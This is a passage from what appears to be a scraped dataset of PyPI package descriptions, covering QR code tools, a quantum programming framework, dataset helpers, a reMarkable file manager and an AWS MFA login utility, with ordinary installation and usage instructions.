file$qr-filetransfer/path/to/file.txtTransfer a full directory.Note:the directory gets zipped before being transferred$qr-filetransfer/path/to/directory/Receive/upload a file from your phone to your computer$qr-filetransfer-r/path/to/receive/file/to/CreditsInspired by the Go projectqr-filetransferLicenseMIT LicenseCopyright \u00a9 2019 Siddharth DushanthaActive contributer -Yu-Chen Lin"} +{"package": "qrftp", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrgc", "pacakge-description": "QR-code-generatorVery basic library for QR code generator"} +{"package": "qri", "pacakge-description": "qri-python\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\n\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\n\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\n\u2588\u2588\u2551\u2584\u2584 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\n\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\n \u255a\u2550\u2550\u2580\u2580\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255dPython client for qri (\"query\")Installationpip install qriAboutPython wrapper to enable usage ofqri, the dataset toolchain. Can\neither use a locally installed qri command-line program to work with your local repository,\nor can directly get datasets from theQri Cloud.Dataset objects returned by this library have the components that exist in thestandard qri model. The body is returned\nas a Pandas DataFrame in order to easily integrate with other data science systems, like\nJupyter Notebook.UsageThe following examples assume you have the latest release of the qri command-line client\ninstalled. You can get this fromhttps://github.com/qri-io/qri/releasesimport qri# Pull a dataset from cloud and add it to your repository\n$ qri.pull(\"b5/world_bank_population\")Fetching from registry...\"Added b5/world_bank_population: ...\"# List datasets in your repository\n$ qri.list()[Dataset(\"b5/world_bank_population\")]# Get that single dataset as a variable\n$ d = qri.get(\"b5/world_bank_population\")# Look at metadata description\n$ d.meta.description( 1 ) United Nations Population Division. World Population Prospects: 2017 Revision...# Get the dataset body as a pandas DataFrame\n$ d.body. country_name country_code indicator_name ...0 Afghanistan AFG Population, total ......TODO: Save changes"} +{"package": "qrImageIndexer", "pacakge-description": "qrCodeImageSorterProject OutlineThis is a python module which is designed to assist in the easy capture and sorting of photos.\nIt aims to solve a problem I have identified where a large number of photos need to be taken\nin a structured manner. While there are apps which aim to acheive this natively on device,\nthese can sometimes make sharing of the task difficult. They are often also not as fast as\nthe native camera apps, also sometimes missing some of the native post-processing on phones.This tool will allow users to produce a simple list of QR codes that can be used as indices\nin the photos. The photos will then be split into folders based on the content of the QR\ncodes.Operational PhilosophyThe principal of this tool is to generate QR codes which can be printed and included in the photo\nset being captured. Images with QR codes included will be detected and used as index photos. Any\nphotos found after (and including) the index photo, up to the next index photo, will be sorted\ninto a directory as indicated by the QR code. Photos will be processed in file name order as\nthis is consistent with the capture method of all phones and cameras I have personally used.All sorting is done through copying. The original files are left in-place and unmodified.QR codes may appear in the images in any order. As the directory is determined by the QR code,\nit will be sorted accordingly. The same code may also appear multiple times and will simply add\nthe additional content to the resulting directory.Sorting ExceptionsNon-ImagesAs the tool is targetting images, any files which are not images will be copied into the\ndirectorynon_image_files/under the target output directory.Files Before Index ImageIf there are images which appear before the first QR-containing image will be copied into\nthe directoryunsorted/.Example Input ImagesInstallationThe package is available on PyPi and can be installed with the following command:pip install qrImageIndexerIf you are not using Windows you will also need to install the zBar binaries (these are included\nin the wheel for Windows users):https://pypi.org/project/pyzbar/InstructionsTool Command Line ArgumentsTo use the tool run the command:python -m qrImageIndexerCommand line useage is as per below:usage: qrImageIndexer [-h] [-g INPUT_TEXT_FILE OUTPUT_PDF | -s INPUT_DIR OUTPUT_DIR] [--pdf-type SORT_TYPE] [-q] [-r] [-p STRING_PREFIX] [-v]\n\noptions:\n -h, --help show this help message and exit\n -g INPUT_TEXT_FILE OUTPUT_PDF, --generate-pdf INPUT_TEXT_FILE OUTPUT_PDF\n Generate a PDF of QR codes from a given text file. Specify\n -s INPUT_DIR OUTPUT_DIR, --sort-photos INPUT_DIR OUTPUT_DIR\n Sort photos based on QR codes found in photos. Once a QR code is found all photos will be sorted into the directory indicated by the code until subsequent codes found\n --pdf-type SORT_TYPE Type of PDF to generate. Either linearly sorted or sorted to enable easy slicing of the printed pages. Accepts \"linear\" or \"sliceable\". Linear will sort down page, sliceable will sort \"through\" the page.\n -q, --qr-for-headings\n Generate a QR code for each heading, not just a code for the last items in a tree.\n -r, --repeat-table-headings\n Repeat table headings on every line\n -p STRING_PREFIX, --string-prefix STRING_PREFIX\n Specify a prefix for use in the generated QR codes to differentiate from codes that might also end up in photos\n -v, --verbose Turn progress text to terminal on or offGeneral usageIn general usage the user will generate QR codes from a text file. These QR codes will then be used as index cards while taking photos. Any photos\nwhich appear subsequent to a QR code but before the next QR code will be sorted into a folder. Any photos which appear before a QR code will be sorted\ninto a specific folder of their own.PDF FormatFor ease of use it is recommended to use the--pdf-type sliceableoption, which will allow, when printed single-sided, for the QR codes to be easily sliced\nand stacked for use in-order.File FormatExpected input file format is as a tab indented list. Each level of indentation is considered a child tested below the preceeding level. When photos are sorted\nthese nested elements will form the file paths.Additional file formats could easily be added\nand may be a good first issue for anyone who wishes to contribute.An example input file is shown below:Line 1\n Line 1 1st indent item 1\n Line 1 2nd indent\n Line 1 1st indent item 2\nLine 2\nLine 3\nLine 4\nLine 5\nLine 6In this case photos underLine 1 1st indent item 1would appear in the directoryLine 1/Line 1 1st indent item 1/and photos underLine 1 2nd indentwill appear in the directoryLine 1/Line 1 1st indent item 1/Line 1 2nd indent/.Generally it is recommended that folder structure be used to sort and plan photo capture logically. E.g. level 1 of the\nstructure may be particular rooms, level 2 may be objects in the room and level 3 may be specifics about the object.There is no limit on the number of levels that may be included in the document, but higher numbers will result in messier/busier output PDFs.Other Recommended OptionsOther options such as-rwhich will result in the headings from further up the tree being repeaded in the output PDF and-qwhich will generate QR codes for headings as well as the tails of the tree may both also be useful.If it is expected that other QR codes may be present, a prefix can also be added to the QR code package. This can be done with the-poption.Using the option-vfor any operations will provide verbose status output to the command line.Generating PDF DocumentAssuming that the above demo file is saved asdemo.txtthe following command would generate a PDF with repeated headings and qr codes for each line in a sliceable format, with the prefix{image}:python -m qrImageIndexer -g demo.txt demo.pdf -r -q --pdf-type sliceable -p \"{image}\"Sorting ImagesAfter taking photos, these images could then be sorted into a folder calledoutputs\\from a folder calledinputs\\as shown below:python -m qrImageIndexer -s inputs\\ outputs\\ -p \"{image}\"Future FeaturesCurrently the module is command line only. In future this will be expanded to include a GUI\nwhich will simplify the generation of QR codes and the scanning of images for users."} +{"package": "qrImageIndexerGUI", "pacakge-description": "qrCodeImageSorterGUIGUI interface for theqrCodeImageSorterrepository. For detailed information on the philosophy\nof the tool see the readme in this repository. This is a GUI interface for this underlying toolset.A Quick (but rough) Video Guidehttps://user-images.githubusercontent.com/65805625/192924326-2560853a-2418-4b95-8806-40d787ae489c.mp4InstallationTo install the tool, run the below command with any version of Python above 3.7:pip install qrImageIndexerGUIInstructionsLaunch WindowTo load the launch window, run the command:python -m qrImageIndexerGUIThis will present the user with the following window:From here you can open either the window for generating the QR codes or for sorting the resultant images.Generate QR CodesThis window allows the user to generate QR codes. It also provides a preview of what the output PDF will look like:The available controls are listed below:Save PDF generated based on the listed inputs to file;Update sample PDF based on the listed inputs;Toggle sorting of PDF for slicing or down the page;Toggle generating QR codes for heading lines;Toggle reapeating of parent headings on every line of the PDF;Toggle inclusion of a prefix in the QR code;Configure prefix to include;Tab-delineated item input;Sample PDF display.The recommended settings are set by default. In most situations the user should just enter their own text in the\ntext entry field (8).Sort ImagesThis window allows the user to sort photos that have been taken with QR codes in them. The interface will look similar to the below.\nNote that the provided screenshot is shown after having scanned a folder of images for demonstration. It will be blank prior to this:The available controls are listed below:Scan images from a selected directory. This will open a prompt asking the user to select a directory;Save sorted images in a directory. This will save the images in the folder structure dictaged by the detected QR codes;Progress bar to indicate image scanning progress;Indicate whether QR codes have a prefix attached;Specify QR code prefix if used;Display images where QR codes are detected;6.1. Path to specified image;6.2. Thumbnail of image;6.3. Path detected in QR code.Not Shown: New Feature - Quick SortThere is now a quick sort button. This button will combine the scanning and saving process. You will be\nprompted for 2 directories, first the input and then the output. Images will be scanned then when\nscanning is complete they will be saved directly to the output directory without displaying the images\nin the window.This will improve performance where large numbers of images loading into the viewing window was\nreducing the processing speed.Note on future featureIt is intended that a feature will be added to allow users to manually add images as key images where they are not detected with a QR code.\nThis will allow users to images where the QR code may not have been detected or where it was forgotten. That is the primary purpose of the\nintermediate preview window but this feature is not implemented yet."} +{"package": "qrimg", "pacakge-description": "qrimgGenerate QRCode ImageInstallpipinstallqrimgUsageHelp InformationC:\\Workspace\\qrimg>qrimg--help\nUsage:qrimg.py[OPTIONS]MESSAGE\n\nOptions:-o,--outputTEXTOutputfilename.[required]-v,--versionINTEGERAnintegerfrom1to40thatcontrolsthesizeoftheQRCode.Thesmallest,version1,isa21x21matrix.DefaulttoNone,meansmakingthecodetodeterminethesizeautomatically.-c,--error-correction[7|15|25|30]controlstheerrorcorrectionusedfortheQRCode.Defaultto30.-s,--box-sizeINTEGERcontrolshowmanypixelseach'box'oftheQRcodeis.Defaultto10.-b,--borderINTEGERcontrolshowmanyboxesthickthebordershouldbe(thedefaultis4,whichistheminimumaccordingtothespecs).-f,--fill-colorTEXTNamedcoloror#RGB color accepted. Defaulttonamedcolor'black'.-b,--back-colorTEXTNamedcoloror#RGB color accepted. Defaulttonamedcolor'white'.--helpShowthismessageandexit.Example 1Use qrimg command generate an image contain information \"Hello world\".qrimg-ohello.png\"Hello world\"Example 2Use qrimg command generate an image contain a url.qrimg-osite.pnghttp://www.example.comExample 3Use qrimg command generate a blue colored image.qrimg-osite.png-fbluehttp://www.example.comExample 3Use RGB color.qrimg-osite.png-f#ff00cc http://www.example.comBug reportPlease report any issues athttps://github.com/zencore-cn/zencore-issues.Releasesv0.2.0 2020/06/29Add controller parameters in generating.v0.1.0 2019/05/25First release."} +{"package": "qri-py", "pacakge-description": "No description available on PyPI."} +{"package": "qrisk", "pacakge-description": "qrisk is a Python library with performance and risk\nstatistics commonly used in quantitative finance byQuantopian Inc."} +{"package": "qrisp", "pacakge-description": "Qrisp is an open-source python framework for high-level programming of Quantum computers.\nBy automating many steps one usually encounters when progrmaming a quantum computer, introducing quantum types, and many more features Qrisp makes quantum programming more user-friendly yet stays performant when it comes to compiling programs to the circuit level.DocumentationThe full documentation, alongside with many tutorials and examples, is available underQrisp Documentation.InstallingThe easiest way to install Qrisp is viapippipinstallqrispQrisp has been confirmed to work with Python version 3.8, 3.9 & 3.10.First Quantum Program with QrispThe very first program you usually write, when learning a new programming language, is printing 'hello world'.\nWe want to do the same, but in a quantum way.For this we can make use of theQuantumStringtype implemented in Qrisp. So we start by creating a new variable of the type QuantumString and assign the value 'hello world':fromqrispimportQuantumStringq_str=QuantumString()q_str[:]=\"hello world\"print(q_str)With theprint(q_str)command, we automatically simulate the circuit generated when assigninghello worldtoq_str. And es expected we gethello worldwith a probility of 1 as output:{'hello world':1.0}Now, let's make things more interesting: What happens, if we apply a Hadamard gate to the first qubit of the 7th character in our string?fromqrispimporth,QuantumStringq_str=QuantumString()q_str[:]=\"hello world\"h(q_str[6][0])print(q_str)Go on, install Qrisp and try it yourself!Of course, Qrisp offers much more than just handling strings with a quantum computer. More examples, like how to solve a quadratic equation with Grover's algorithm or how to solve the Travelling Salesman Problem on a quantum computer, can be foundhere.Authors and CitationQrisp was mainly devised and implemented by Raphael Seidel, supported by Sebastian Bock and Nikolay Tcholtchev.If you have comments, questions or love letters, feel free to reach out to us:raphael.seidel@fokus.fraunhofer.desebastian.bock@fokus.fraunhofer.denikolay.tcholtchev@fokus.fraunhofer.deLicenseEclipse Public License 2.0"} +{"package": "qritwikaeropy", "pacakge-description": "No description available on PyPI."} +{"package": "qrkey", "pacakge-description": "QrkeySummaryQrkey is a library implementing a protocol designed to facilitate the\ndeployment of robots swarm.\nThe protocol relies onMQTTso that a\nQrkey server is reachable even with a private IP address.\nAccess to the swarm is managed by a QR code based authentication scheme.InstallationPython server library:pip install qrkeyNode client library:npm i qrkeyLicenseqrkeyis distributed under the terms of theBSD-3-Clauselicense."} +{"package": "qrkit", "pacakge-description": "Simple binding of qrencode library released under the public domain\nextracted from qurl.RequirementsTo build the binding you will need to install:libqrencode-devCythonTo use it you will need either:Python Imaging LibraryPillowInstallationDo one of this command to install it from pypipip install qrkitor:easy_install qrkitFrom code:$ python setup.py installSimple usagefrom qrkit.qrimg import encode_to_img\n\nimg = encode_to_img('http://www.python.org/', width=300, border=10)\nimg.save('qrimage.png', 'PNG', quality=80)"} +{"package": "qrl", "pacakge-description": "README.pypi"} +{"package": "qrlew-datasets", "pacakge-description": "datasetsThis helps with the use of standard SQL datasets.It comes with 4 datasets:'extract': an extract from 2 simple datasets 'census' (from the US cenus) and 'beacon' (with japanese names and labels).'financial': fromhttps://relational.fit.cvut.cz/dataset/Financial'imdb': fromhttps://relational.fit.cvut.cz/dataset/IMDb'hematitis': fromhttps://relational.fit.cvut.cz/dataset/HepatitisInstalationThe package can be installed with:pipinstallqrlew-datasetsThe library assumes:either that postgresql is installed,or that docker is installed and can spawn postgresql containers.Postgresql in a containerThe library automatically spawns containers. There is nothing to do.Without docker installedSetup apsqlas inhttps://colab.research.google.com/github/tensorflow/io/blob/master/docs/tutorials/postgresql.ipynbYou can set the port to use: here 5433.# Inspred by https://colab.research.google.com/github/tensorflow/io/blob/master/docs/tutorials/postgresql.ipynb#scrollTo=YUj0878jPyz7sudoapt-get-y-qqupdate\nsudoapt-get-y-qqinstallpostgresql-14# Start postgresql server# sudo sed -i \"s/#port = 5432/port = 5433/g\" /etc/postgresql/14/main/postgresql.confsudosed-i\"s/port = 5432/port = 5433/g\"/etc/postgresql/14/main/postgresql.conf\nsudoservicepostgresqlstart# Set passwordsudo-upostgrespsql-Upostgres-c\"ALTER USER postgres PASSWORD 'pyqrlew-db'\"# Install python packagesTesting the absence of docker if docker is installed:You can simulate the absence of docker by running this code inside a container.First run:docker run --name test -d -i -t -v .:/datasets ubuntu:22.04Then run:docker exec -it test bashBuilding the.sqldumpsTo build the datasets, install the requirements with:poetryshellYou can then build the datasets with:python-mdatasets.buildYou may need to install the requirements of some drivers such as:https://pypi.org/project/mysqlclient/"} +{"package": "qrl-graph", "pacakge-description": "QRL_graphReinforcement Learning for the quantum speedup in the graphGiven a graph, we try to compute the classical and quantum critical time. The definition of the criticial time is defined as the hitting time of the endpoints with the probility bigger than $p_0$.Installpip install qrl_graph==0.0.13Usageimportnumpyasnpfromscipy.sparse.csgraphimportlaplacianimportnetworkxasnximportmatplotlib.pyplotaspltimportmatplotlibfromqrl_graph.graph_env.graphimportGraphg=np.array([[0,1,1,0],[1,0,0,1],[1,0,0,1],[0,1,1,0]])g_env=Graph(g=g)print('Laplacian matrix:\\n',g_env.laplacian)t_cl=g_env.get_classical_time(p0=0.1)t_q=g_env.get_quantum_time(p0=0.1)print('Classical time:',t_cl)print('Quantum time:',t_q)print('Speed up:',t_cl/t_q)# uncomment to show the graph# g_env.show_graph()The results areLaplacian matrix:\n [[ 2 -1 -1 0]\n [-1 2 0 -1]\n [-1 0 2 -1]\n [ 0 -1 -1 2]]\nClassical time: 0.25000000000000006\nQuantum time: 0.6000000000000003\nSpeed up: 0.4166666666666665Linear chainfromqrl_graph.graph_env.graphimportGraphfromqrl_graph.utilsimportconstruct_linear_graphN=40g=construct_linear_graph(N)g_env=Graph(g=g)# print('Laplacian matrix:\\n', g_env.laplacian)p0=1.0/(2*N)t_cl=g_env.get_classical_time(p0=p0)t_q=g_env.get_quantum_time(p0=p0)print('Linear chain, N =',N)print('Classical time:',t_cl)print('Quantum time:',t_q)print('Speed up:',t_cl/t_q)glued treefromqrl_graph.graph_env.graphimportGraphfromqrl_graph.utilsimportconstruct_glued_tree_graph# this is the height of binary tree, and total height of the glued tree is 2*heighth=3g=construct_glued_tree_graph(h)N=g.shape[0]g_env=Graph(g=g)# print('Laplacian matrix:\\n', g_env.laplacian)p0=1.0/(2*N)t_cl=g_env.get_classical_time(p0=p0)t_q=g_env.get_quantum_time(p0=p0)print('Glued tree, N =',N)print('Classical time:',t_cl)print('Quantum time:',t_q)print('Speed up:',t_cl/t_q)"} +{"package": "qrllearner", "pacakge-description": "No description available on PyPI."} +{"package": "qrlocator", "pacakge-description": "QRlocatorOverviewThis package allows a user to get the 3D postion of QR codes from an image. It uses the OpenCV and Pyzbar libraries to scan and decode the QR codes, but you can also use other QR code scanning libraries and add information to the class usingadd_qr_code. This class mainly provides theX,Y, andZcoordinates of the center point of a code, whereYis a horizontal axis parallel to the camera's direction,Xis a horizontal axis perpendicular to the camera's direction, andZis a vertical axis representing the codes height.add picturesHomepagehttps://test.pypi.org/project/qrlocator/Installpip install -i https://test.pypi.org/simple/ qrlocator \nfrom qrlocator.QRlocator import QRlocatorQuick StartThe creation of the QRlocator class requires 4 parameters. It is very likely that you don't know some of these values, or the values you have are incorrect. This tool can automatically find the 3 best fit values for your camera:image_path(str): The file path of the image you wish to scan.focal_ratio(float): This is the focal length in mm over the sensor width in mm (focal/sensor) of the camera that was used to take the current image.x_focal_angle_scalar(float): A scalar value to correct the x-angle calculated from the image.z_focal_angle_scalar(float): A scalar value to correct the z-angle calculated from the image.qr_locator=QRlocator(r'path_to_image',focal_ratio,x_focal_angle_scalar,z_focal_angle_scalar)qr_locator.scan_image()qr_locator.show_visualization(qr_code_side_length_mm)Functionsqr_locator.scan_image()Scans and saves the QR codes from the current imageqr_locator.modify_image(image)qr_locator.modify_image_path(r'image_path')Used to modify the locator's current imageqr_locator.get_y_position(data,qr_code_side_length_mm)Calculates and returns the Y coordinate (horizontal axis parallel to the camera's direction) of the QR code in inches.data(str): The string of data present in your QR codeqr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_locator.get_x_position(data,qr_code_side_length_mm)Calculates and returns the X coordinate (horizontal axis perpendicular to the camera's direction) of the QR code in inches.data(str): The string of data present in your QR codeqr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_locator.get_z_position(data,qr_code_side_length_mm)Calculates and returns the Z coordinate (vertical axis representing the code\u2019s height) of the QR code in inches.data(str): The string of data present in your QR codeqr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_locator.show_visualization(qr_code_side_length_mm,qr_codes=None)Generates and displays a 2D visualization of the located QR codes in XY and XZ planes.qr_code_side_length_mm(float): The actual side length of the QR code in millimetersqr_codes(dict, optional): A dictionary containing QR codes. If not provided, the method will use the QR codes stored in the object.qr_locator.add_qr_code(data,tl,tr,br,bl)Adds a QR code to the classtl(float): The pixel location pair (x,y) of the top left corner of the QR codetr(float): The pixel location pair (x,y) of the top right corner of the QR codebr(float): The pixel location pair (x,y) of the botom right corner of the QR codebl(float): The pixel location pair (x,y) of the bottom left corner of the QR codeqr_locator.get_qr_codes()qr_locator.get_qr_code(data)Returns the dictionary of the locator's code(s)data(str): The string of data present in your QR codeqr_locator.get_max_side_length(data)Calculates and returns the maximum side length of the QR code in pixels.data(str): The string of data present in your QR code"} +{"package": "qrm", "pacakge-description": "QrM - Qt5 based file explorer for reMarkableUse a Qt5 based UI tomanageview, upload, delete content of/to your\nreMarkable I/II via SSH.Project pageUsageOnce configured runqrmto start up a UI, connect to and see a list of content on a (WiFi enabled\nand switched on) reMarkable device. Drag and drop EPUB and PDF files onto the window to make them\navailable on the device.Runqrm [ls|list]to list content on the connected deviceRunqrm [upload|push] []to copy stuff onto the connected deviceRunqrm infoto see configuration and stuffRunqrm rebootto .. you know..Runqrm config-auth = ...to configure stuff, e.g.Please note that currently reMarkable will not recognize file modifications done via SSH - to make\nnew files available you'll have to reboot the device. Runqrm rebootor press theRebootbutton\nto do this via SSH (or reboot it manually).ConfigurationIn the UI just enter your credentials, they're getting saved automatically.The command line interface allows persistant configuration using theconfig-authsub-command:qrm config-auth host=192.168.178.13 password='s0rry_Pl4in+ex+!'Please note that currently only connection via IP address (rather than hostname) and plaintext\npassword is working. This is subject to change (\"of course\").ToDo for v1.0Allow hostnames instead of IP addressesMake use of shared keys and configuration in~/.ssh/configSupport drag&drop to add content in UISupport deletionSupport PdfSupport web pages via PdfFuture featuresDownload and manage notesMake backupsOther convenience stuff via SSH, e.g. installing softwareInstallationpip3 install [--user] [--upgrade] qrmDevelopment & Contribution# provide dependencies, consider also using pyenv\npip3 install -U poetry pre-commit\n\ngit clone --recurse-submodules https://projects.om-office.de/frans/qrm.git\n\ncd qrm\n\n# activate a pre-commit gate keeper\npre-commit install\n\n# if you need a specific version of Python inside your dev environment\npoetry env use ~/.pyenv/versions/3.10.4/bin/python3\n\npoetry installLicenseFor all code contained in this repository the rules of GPLv3 apply unless\notherwise noted. That means that you can do what you want with the source\ncode as long as you make the files with their original copyright notice\nand all modifications available.SeeGNU / GPLv3for details.Read(nothing here yet)"} +{"package": "qrm545-xd", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrmagic", "pacakge-description": "QR MagicSome magical semi-automated tools to better handle sample tracking during fieldwork.To install:python3 -m pip install qrmagicOr, to get the development version:python3 -m pip install -e git+https://github.com/kdm9/NVTK.gitQR Code Label PrintingMake a PDF of labels for each sample ID. There are a few hard-coded \"Avery\" label\ntypes commonly used in the Weigel group, and it's super easy to add others\n(please create a github issue if you need help doing so, or want me to build a\nnew label type into the code).$python3-mqrmagic.labelmaker--help\nusage:labelmaker.py[-h][--demoDIR][--list-label-types][--label-typeTYPE][--copiesN][--outputFILE][--id-fileFILE][--id-formatFORMAT][--id-startN][--id-endN]optionalarguments:-h,--helpshowthishelpmessageandexit--demoDIRWriteademo(10labels,fourrepsperlabel)foreachlabeltypetoDIR.--list-label-typesWritealistoflabeltypes.--label-typeTYPELabeltype.--copiesNCreateNcopiesofeachlabel.--outputFILEOutputPDFfile.--id-fileFILEFileofIDs,oneperline.--id-formatFORMATPython-styleformatstringgoverningIDformate.g.WGL{:04d}givesWGL0001..WGL9999--id-startNFirstIDnumber(default1)--id-endNLastIDnumber(default100)To see what label types are available, do:$ python3 -m qrmagic.labelmaker --list-label-types\nL7636: Mid-sized rounded rectangular labels (45x22mm) in sheets of 4x12\nL3667: Mid-sized rectangular labels (48x17mm) in sheets of 4x16\nL7658: Small labels (25x10mm) in sheets of 7x27\nCryoLabel: Cryo Labels for screw-cap eppies. White on left half, clear on right.One can also create a demonstration PDF for each label type with the command:$python3-mqrmagic.labelmaker--demooutput_dir/QR Code-based Image organisationSo, we took all these photos in the field, now what do we do with them? The first step is to organise them by sample. To do so manually is cumbersome, so here are some tools to help.Step 1: scan images on your machineThis CLI tool will scan your images, doing its best to decode all the QRcodes\nthey contain. For each image it also reports the location and time the image\nwas taken, and various other bits of metadata.NB: for silly javascript reasons, you need to have all images be in a single\ndirectory. If you have your images organised in directories (e.g. by date, or\nby camera), please run this process once per directory, or move or symlink all\nimages into a single directory.qrmagic-detect -o my-images.json my-images/*.JPGStep 2: curationNow, go tohttps://qrmagic.kdmurray.id.au/imagesort.html. Here, you should\nupload the JSON file created above, and up will pop a table of images. You can\nthen try automatically filling missing barcodes based on the adjacent codes\n(always do a bit of manual curation here), or manually type in QR codes that\nare not detectable. When you are finished, you can download a Bash script which\ncontains commands to rename all your files by sample ID (or whatever your\nbarcodes denote).Step 3: rename imagesOnce downloaded, the renamer script should be run in the same directory your\nimages are all in:cd /path/to/my-images\nbash -x ~/Downloads/rename.sh"} +{"package": "qrmaker", "pacakge-description": "# qr-poster-maker\n\u4e8c\u7ef4\u7801\u6d77\u62a5\u751f\u6210\u5668"} +{"package": "qrm-client", "pacakge-description": "No description available on PyPI."} +{"package": "qrmfinal-xd", "pacakge-description": "No description available on PyPI."} +{"package": "qrmine", "pacakge-description": ":flashlight: QRMine/\u02c8k\u00e4rm\u012bn/QRMine is a suite of qualitative research (QR) data mining tools in Python using Natural Language Processing (NLP) and Machine Learning (ML). QRMine is work in progress.Read More..What it doesNLPLists common categories for open coding.Create a coding dictionary with categories, properties and dimensions.Topic modelling.Arrange docs according to topics.Compare two documents/interviews.Select documents/interviews by sentiment, category or title for further analysis.Sentiment analysisMLAccuracy of a neural network model trained using the dataConfusion matrix from an support vector machine classifierK nearest neighbours of a given recordK-Means clusteringPrincipal Component Analysis (PCA)Association rulesHow to installpip install qrmine\npython -m spacy download en_core_web_smMac usersMac users, please installlibompfor XGBoostbrew install libompHow to Useinput files are transcripts as txt files and a single csv file with numeric data. The output txt file can be specified.The coding dictionary, topics and topic assignments can be created from the entire corpus (all documents) using the respective command line options.Categories (concepts), summary and sentiment can be viewed for entire corpus or specific titles (documents) specified using the --titles switch. Sentence level sentiment output is possible with the --sentence flag.You can filter documents based on sentiment, titles or categories and do further analysis, using --filters or -fMany of the ML functions like neural network takes a second argument (-n) . In nnet -n signifies the number of epochs, number of clusters in kmeans, number of factors in pca, and number of neighbours in KNN. KNN also takes the --rec or -r argument to specify the record.Variables from csv can be selected using --titles (defaults to all). The first variable will be ignored (index) and the last will be the DV (dependant variable).Command-line optionsqrmine --helpCommandAlternateDescription--inp-iInput file in the text format with Topic--out-oOutput file name--csvcsv file name--num-nN (clusters/epochs etc depending on context)--rec-rRecord (based on context)--titles-tDocument(s) title(s) to analyze/compare--codedictGenerate coding dictionary--topicsGenerate topic model--assignAssign documents to topics--catList categories of entire corpus or individual docs--summaryGenerate summary for entire corpus or individual docs--sentimentGenerate sentiment score for entire corpus or individual docs--nlpGenerate all NLP reports--sentenceGenerate sentence level scores when applicable--nnetDisplay accuracy of a neural network model -n epochs(3)--svmDisplay confusion matrix from an svm classifier--knnDisplay nearest neighbours -n neighbours (3)--kmeansDisplay KMeans clusters -n clusters (3)--cartDisplay Association Rules--pcaDisplay PCA -n factors (3)Use it in your codefromqrmineimportContentfromqrmineimportNetworkfromqrmineimportQrminefromqrmineimportReadDatafromqrmineimportSentimentfromqrmineimportMLQRMineMore instructions and a jupyter notebook availablehere.Input file formatNLPIndividual documents or interview transcripts in a single text file separated by Topic. Example belowTranscript of the first interview with John.\nAny number of lines\nFirst_Interview_John\n\nText of the second interview with Jane.\nMore text.\nSecond_Interview_Jane\n\n....Multiple files are suported, each having only one break tag at the bottom with the topic.\n(The tag may be renamed in the future)MLA single csv file with the following generic structure.Column 1 with identifier. If it is related to a text document as above, include the title.Last column has the dependent variable (DV). (NLP algorithms like the topic asignments may provide the DV)All independent variables (numerical) in between.index, obesity, bmi, exercise, income, bp, fbs, has_diabetes\n1, 0, 29, 1, 12, 120, 89, 1\n2, 1, 32, 0, 9, 140, 92, 0\n......AuthorBell Eapen(McMaster U) |Contact|This software is developed and tested usingCompute Canadaresources.See also::fire: The FHIRForm framework for managing healthcare eFormsSee also::eyes: Drishti | An mHealth sense-plan-act framework!CitationPlease cite QRMine in your publications if it helped your research. Here\nis an example BibTeX entry(Read paper on arXiv):@article{eapenbr2019qrmine,\n title={QRMine: A python package for triangulation in Grounded Theory},\n author={Eapen, Bell Raj and Archer, Norm and Sartpi, Kamran},\n journal={arXiv preprint arXiv:2003.13519 },\n year={2020}\n}QRMine is inspired bythis workand the associatedpaper.Give us a star \u2b50\ufe0fIf you find this project useful, give us a star. It helps others discover the project.Demo"} +{"package": "qr_monkey", "pacakge-description": "qr_monkeyAn API Client for qrcode-monkey API that integrates custom and unique looking QR codes into your system or workflow.Installation$pipinstallqr_monkeyUsage1. Import qr_monkeyAfter installing the package, import it into your project.import qr_monkey2. Create base_urlUse the provided custom function to create a custom QR code with the specified parameters:base_url = \"specify the url you want to link to the QR code\"3. Set parametersYou can set these according to the'QRCode-Monkey website'For example:params = {\n\"data\": base_url,\n\"config\": {\n\"body\": \"circle\",\n},\n\"size\": 300,\n\"download\": False,\n\"file\": \"png\"\n}4. Create custom QR codeqr_monkey.custom(base_url,params)ContributingInterested in contributing? Check out the contributing guidelines. Please note that this project is released with a Code of Conduct. By contributing to this project, you agree to abide by its terms.Licenseqr_monkeywas created by Vansh Murad Kalia. It is licensed under the terms of the MIT license.Creditsqr_monkeywas created withcookiecutterand thepy-pkgs-cookiecuttertemplate."} +{"package": "qrmr", "pacakge-description": "Work secure using MFA according to best practices, and efficiently\nwith AWS terminal tools likeawscli,aws-shell,terraform, etc.Highly opinionated Amazon Web Services (AWS) terminal login toolkit, focused on\nenforcing and simplifying AWS Multi-Factor Authentication (MFA).Written in Python 3, backwards compatible with Python 2, thanks tofutures!Currently being heavily tested in production against AWS multi-account setup (Well-Architected Framework) on macOS High Sierra.Feels most at home usingvirtualenv, of course.How it works:Stores your AWS IAM credential profile in~/.qrmr/credentials.ini;Prompts for MFA OTP code;Uses AWS STS to retrieve and store fresh SessionToken and temporary Access Key ID and Secret Access Key using your credential profile.Near future:Manage~/.aws/credentialsand~/.aws/configfilesUnit Tests :)Because you probably just want to start using it:Installation of QRMR:pip install qrmrSetup of AWS Credentials:qrmr setupRefreshing your SessionToken and temporary keys:qrmr refreshBe cool:aws s3 lsREMEMBER:set environment variable AWS_PROFILE in your shell or virtualenv to\nmake life easier:export AWS_PROFILE=iam_user_nameFind out more features by running:qrmr--helpFind us on:https://gitlab.com/qrmr/qrmrResources:https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.htmlLicense / Copyright / Disclaimer:(c)Copyright 2017 - 2018, all rights reserved by QRMR / ALDG / Alexander L. de Goeij.THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 